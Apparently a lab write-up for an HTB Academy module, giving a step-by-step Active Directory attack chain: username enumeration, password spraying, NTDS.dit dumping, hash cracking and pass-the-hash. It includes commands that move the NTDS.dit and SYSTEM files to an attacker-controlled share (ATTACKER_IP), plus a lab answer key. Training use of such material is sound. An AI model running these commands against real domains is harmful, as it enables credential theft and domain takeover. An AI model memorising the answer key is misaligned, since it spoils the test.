NTDS.dit Extraction & Analysis

🎯 Overview

NTDS.dit (NT Directory Services Directory Information Tree) is the holy grail of Active Directory attacks. This file contains:

Every domain user's password hash
Group memberships and permissions
Kerberos keys and authentication data
Complete domain schema information

"If this file can be captured, we could potentially compromise every account on the domain"

🏗️ Active Directory Authentication Architecture

Domain Authentication Flow

User Login → LSASS.exe → Authentication Packages → NTLM/Kerberos → AD Directory Services

Key Points

Domain-joined systems authenticate against Domain Controller, not local SAM
Local accounts still accessible with hostname\username or .\username
NTDS.dit location: %systemroot%\ntds\NTDS.dit (usually C:\Windows\NTDS\NTDS.dit)

🔍 Username Enumeration and Discovery

OSINT for Employee Discovery

# HTB Academy Example: 
# Found through social media/company website:
# - John Marston (IT Director)
# - Carol Johnson (Financial Controller)  
# - Jennifer Stapleton (Logistics Manager)

# Google dorking techniques:
"@inlanefreight.com" site:linkedin.com
"inlanefreight.com filetype:pdf"
site:inlanefreight.com "directory" OR "staff" OR "employees"

Username Generation with Username Anarchy

# Clone Username Anarchy
git clone https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy

# Generate username variations for John Marston
./username-anarchy John Marston > usernames.txt

# Manual creation of targeted list
cat > usernames.txt << EOF
jmarston
john.marston
marston.john
cjohnson
carol.johnson
johnson.carol
jstapleton
jennifer.stapleton
stapleton.jennifer
EOF

Username Enumeration with Kerbrute

# Download Kerbrute
wget -q https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O kerbrute
chmod +x kerbrute

# Get domain name first
netexec smb 10.129.202.85
# Output shows: (domain:ILF.local)

# Enumerate valid usernames
./kerbrute userenum -d ILF.local --dc 10.129.202.85 usernames.txt

# Expected output:
# [+] VALID USERNAME: jmarston@ILF.local
# [+] VALID USERNAME: cjohnson@ILF.local
# [+] VALID USERNAME: jstapleton@ILF.local

🗡️ Password Attacks Against Active Directory

Dictionary Attacks with NetExec

# Brute force single user
netexec smb 10.129.202.85 -u jmarston -p /usr/share/wordlists/fasttrack.txt -d ILF.local

# Password spraying multiple users
netexec smb 10.129.202.85 -u usernames.txt -p /usr/share/wordlists/fasttrack.txt --continue-on-success -d ILF.local

# HTB Academy result:
# [+] ILF.local\jmarston:P@ssword!

Kerbrute Password Attacks

# Brute force with Kerbrute
./kerbrute bruteuser -d ILF.local --dc 10.129.202.85 /usr/share/wordlists/fasttrack.txt jmarston

# Expected result:
# [+] VALID LOGIN: jmarston@ILF.local:P@ssword!

🎫 NTDS.dit Extraction Methods

Method 1: NetExec ntdsutil Module (Fastest)

# One-command NTDS.dit extraction
netexec smb 10.129.202.85 -u jmarston -p 'P@ssword!' -d ILF.local -M ntdsutil

# Alternative direct method
netexec smb 10.129.202.85 -u jmarston -p 'P@ssword!' -d ILF.local --ntds

# Expected output:
# NTDSUTIL   10.129.202.85   445   DC01   [*] Dumping ntds with ntdsutil.exe
# NTDSUTIL   10.129.202.85   445   DC01   Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
# NTDSUTIL   10.129.202.85   445   DC01   jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::

Method 2: Manual VSS (Volume Shadow Copy)

# Step 1: Connect with Evil-WinRM
evil-winrm -i 10.129.202.85 -u jmarston -p 'P@ssword!'

# Step 2: Check privileges (ensure Domain Admin)
net user jmarston
# Look for: Global Group memberships *Domain Admins

# Step 3: Create Volume Shadow Copy
vssadmin CREATE SHADOW /For=C:
# Output: Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

# Step 4: Copy NTDS.dit and registry hives
mkdir C:\temp
cmd.exe /c copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit" C:\temp\NTDS.dit
cmd.exe /c copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM" C:\temp\SYSTEM

# Step 5: Transfer to attack host
# On attack host:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /tmp/

# On target:
cmd.exe /c move C:\temp\NTDS.dit \\ATTACKER_IP\CompData
cmd.exe /c move C:\temp\SYSTEM \\ATTACKER_IP\CompData

Method 3: Impacket secretsdump

# Remote NTDS.dit extraction
python3 secretsdump.py ILF.local/jmarston:P@ssword!@10.129.202.85 -just-dc-ntlm

# Local extraction from files
impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL

🔓 Hash Cracking and Analysis

Hash Format Understanding

# NTDS.dit output format:
# username:RID:LM_hash:NT_hash:::

# HTB Academy Jennifer Stapleton example:
# jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
#                                                   ^-- This is the NT hash to crack

Extracting and Cracking Jennifer Stapleton's Hash

# Extract Jennifer Stapleton's hash
grep -i "stapleton" ntds_dump.txt
# Output: jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::

# Extract just the NT hash (4th field)
echo "161cff084477fe596a5db81874498a24" > jstapleton_hash.txt

# Crack with Hashcat
hashcat -m 1000 jstapleton_hash.txt /usr/share/wordlists/rockyou.txt

# HTB Academy result:
# 161cff084477fe596a5db81874498a24:Winter2008

Bulk Hash Processing

# Extract all NT hashes from NTDS dump
grep ":::" ntds_dump.txt | cut -d: -f4 > all_nt_hashes.txt

# Create username:hash mapping
grep ":::" ntds_dump.txt | awk -F: '{print $1":"$4}' > user_hash_mapping.txt

# Extract only enabled accounts
grep -iv disabled ntds_dump.txt | cut -d: -f1 > enabled_users.txt

⚔️ Pass-the-Hash Attacks

When Cracking Fails

# Use NT hash directly for authentication
evil-winrm -i 10.129.202.85 -u Administrator -H 64f12cddaa88057e06a81b54e73b949b

# Lateral movement with Impacket
python3 psexec.py -hashes :64f12cddaa88057e06a81b54e73b949b Administrator@TARGET_IP

# Network-wide testing with NetExec
netexec smb SUBNET_RANGE -u Administrator -H 64f12cddaa88057e06a81b54e73b949b

🏆 Complete HTB Academy Attack Workflow

Phase 1-2: Discovery and Enumeration

# 1. OSINT: Found John Marston, Carol Johnson, Jennifer Stapleton
# 2. Generate usernames with Username Anarchy
./username-anarchy John Marston > usernames.txt

# 3. Domain discovery
netexec smb 10.129.202.85  # → domain:ILF.local

# 4. Username validation
./kerbrute userenum -d ILF.local --dc 10.129.202.85 usernames.txt
# → [+] VALID USERNAME: jmarston@ILF.local

Phase 3-4: Password Attack and NTDS Extraction

# 5. Password brute force
./kerbrute bruteuser -d ILF.local --dc 10.129.202.85 /usr/share/wordlists/fasttrack.txt jmarston
# → [+] VALID LOGIN: jmarston@ILF.local:P@ssword!

# 6. NTDS.dit extraction
netexec smb 10.129.202.85 -u jmarston -p 'P@ssword!' -d ILF.local -M ntdsutil
# → All domain hashes extracted

Phase 5: Hash Cracking

# 7. Extract Jennifer Stapleton's hash
# jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::

# 8. Crack the hash
echo "161cff084477fe596a5db81874498a24" > jstapleton_hash.txt
hashcat -m 1000 jstapleton_hash.txt /usr/share/wordlists/rockyou.txt
# → Result: Winter2008

📋 Quick Reference Commands

Discovery

# Domain enumeration
netexec smb TARGET_IP

# Username enumeration  
./kerbrute userenum -d DOMAIN.local --dc TARGET_IP usernames.txt

# Password attacks
netexec smb TARGET_IP -u users.txt -p passwords.txt --continue-on-success -d DOMAIN.local

NTDS.dit Extraction

# NetExec method (recommended)
netexec smb TARGET_IP -u USER -p PASS -d DOMAIN.local -M ntdsutil

# Direct extraction
netexec smb TARGET_IP -u USER -p PASS -d DOMAIN.local --ntds

# Impacket method
python3 secretsdump.py DOMAIN.local/USER:PASS@TARGET_IP -just-dc-ntlm

Hash Analysis

# Extract NT hashes
grep ":::" ntds_dump.txt | cut -d: -f4 > nt_hashes.txt

# Crack with Hashcat
hashcat -m 1000 nt_hashes.txt /usr/share/wordlists/rockyou.txt

# Pass-the-Hash
evil-winrm -i TARGET_IP -u Administrator -H NTHASH

🎯 HTB Academy Answer Key

Based on the complete walkthrough:

NTDS.dit file name: NTDS.dit
Administrator NT hash: 64f12cddaa88057e06a81b54e73b949b
John Marston credentials: jmarston:P@ssword!
Jennifer Stapleton password: Winter2008

💡 Key Takeaways

OSINT drives success - Real employee names lead to valid usernames
Username enumeration first - Validate targets before password attacks
NTDS.dit = domain ownership - Every account's hash in one file
NetExec ntdsutil - Fastest extraction method
VSS understanding - Manual method for deeper control
Pass-the-Hash - Use hashes when cracking fails
Complete methodology - From OSINT to domain compromise

This guide covers the complete NTDS.dit attack methodology as demonstrated in HTB Academy's Password Attacks module.

PreviousActive Directory Attacks NextActive Directory Attacks

Last updated 6 months ago

hashtag🎯 Overview

hashtag🏗️ Active Directory Authentication Architecture

hashtagDomain Authentication Flow

hashtagKey Points

hashtag🔍 Username Enumeration and Discovery

hashtagOSINT for Employee Discovery

hashtagUsername Generation with Username Anarchy

hashtagUsername Enumeration with Kerbrute

hashtag🗡️ Password Attacks Against Active Directory

hashtagDictionary Attacks with NetExec

hashtagKerbrute Password Attacks

hashtag🎫 NTDS.dit Extraction Methods

hashtagMethod 1: NetExec ntdsutil Module (Fastest)

hashtagMethod 2: Manual VSS (Volume Shadow Copy)

hashtagMethod 3: Impacket secretsdump

hashtag🔓 Hash Cracking and Analysis

hashtagHash Format Understanding

hashtagExtracting and Cracking Jennifer Stapleton's Hash

hashtagBulk Hash Processing

hashtag⚔️ Pass-the-Hash Attacks

hashtagWhen Cracking Fails

hashtag🏆 Complete HTB Academy Attack Workflow

hashtagPhase 1-2: Discovery and Enumeration

hashtagPhase 3-4: Password Attack and NTDS Extraction

hashtagPhase 5: Hash Cracking

hashtag📋 Quick Reference Commands

hashtagDiscovery

hashtagNTDS.dit Extraction

hashtagHash Analysis

hashtag🎯 HTB Academy Answer Key

hashtag💡 Key Takeaways